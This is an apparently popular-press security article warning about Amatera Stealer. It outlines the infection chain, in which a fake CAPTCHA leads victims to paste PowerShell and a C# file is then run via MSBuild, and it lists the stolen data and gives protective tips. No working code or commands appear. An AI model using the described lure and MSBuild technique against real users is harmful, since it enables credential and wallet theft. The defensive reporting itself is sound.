Amatera Stealer: The Silent Data Thief Infecting Your Devices

The Rise of Amatera Stealer

Imagine visiting a normal website, solving a simple CAPTCHA, and suddenly your passwords, credit cards, and crypto wallets are stolen. That’s exactly what’s happening with Amatera Stealer, a highly advanced malware now spreading rapidly.

Security experts have confirmed that this isn’t just another virus it’s an upgraded, more dangerous version of the older ACR Stealer, packed with new tricks to evade detection.

Worse yet, it’s being sold for just $199 on hacker forums, making it cheap and accessible to cybercriminals worldwide.

From ACR to Amatera: A Malware Reborn

Back in July 2024, the creators of ACR Stealer suddenly announced they were shutting down. But their farewell message hinted at a return—and by December 2024, Amatera Stealer emerged.

Researchers at Proofpoint found that Amatera uses the same core hacking tools as ACR but with major improvements:
Better anti-detection (harder for antivirus to spot)
Smarter delivery methods (no shady email attachments)
Blockchain-based attacks (making takedowns nearly impossible)

The malware specializes in stealing:
Saved passwords (Chrome, Firefox, Edge)
Credit card details (from autofill data)
Cryptocurrency wallets (MetaMask, Exodus, etc.)
Important documents (PDFs, Word files, databases)

How the Attack Works (Step by Step)

1. You Visit a Hacked Website

Cybercriminals inject malicious code into legitimate sites often through fake ads or phishing links.

2. A Fake CAPTCHA Appears

Instead of a real CAPTCHA, you see a fake verification screen telling you to:

• Press Windows Key + R (opens the Run command)

• Paste a malicious PowerShell script

• Hit Enter (triggering the malware)

3. The Malware Installs Silently

The script downloads a harmless-looking C# file and runs it using Microsoft’s own MSBuild tool a trick that bypasses most security software.

4. Your Data Gets Stolen

Once inside, Amatera quietly collects:

• Browser passwords

• Crypto wallet keys

• Session cookies (letting hackers log into your accounts)

• Screenshots & clipboard data

Why This Malware Is So Hard to Stop

Unlike old-school viruses, Amatera uses real Windows tools to avoid suspicion. Here’s what makes it dangerous:

No Suspicious Downloads:  It doesn’t rely on shady .exe files.
Uses Legitimate Software: MSBuild is a real Microsoft tool.
Hosted on Blockchain:  Parts of the attack are stored on Binance Smart Chain, making takedowns difficult.

Even worse, victims often don’t realize they’re infected until it’s too late.

How to Protect Yourself (6 Essential Steps)

Since Amatera spreads through fake CAPTCHAs and hacked sites, here’s how to stay safe:

1. Never run random PowerShell commands : No real CAPTCHA asks for this.

2. Use a password manager : It encrypts logins, making them harder to steal.

3. Enable 2FA everywhere :  Even if hackers get your password, they can’t log in.

4. Keep software updated : Many attacks exploit old security holes.

5. Install a strong antivirus :  Some can detect sneaky PowerShell attacks.

6. Be wary of unknown sites : If a CAPTCHA seems odd, close the tab.

Final Warning: Stay Alert

Amatera Stealer proves that hackers are getting smarter using trusted tools and sneaky tricks to avoid detection. The best defense? Staying informed and cautious.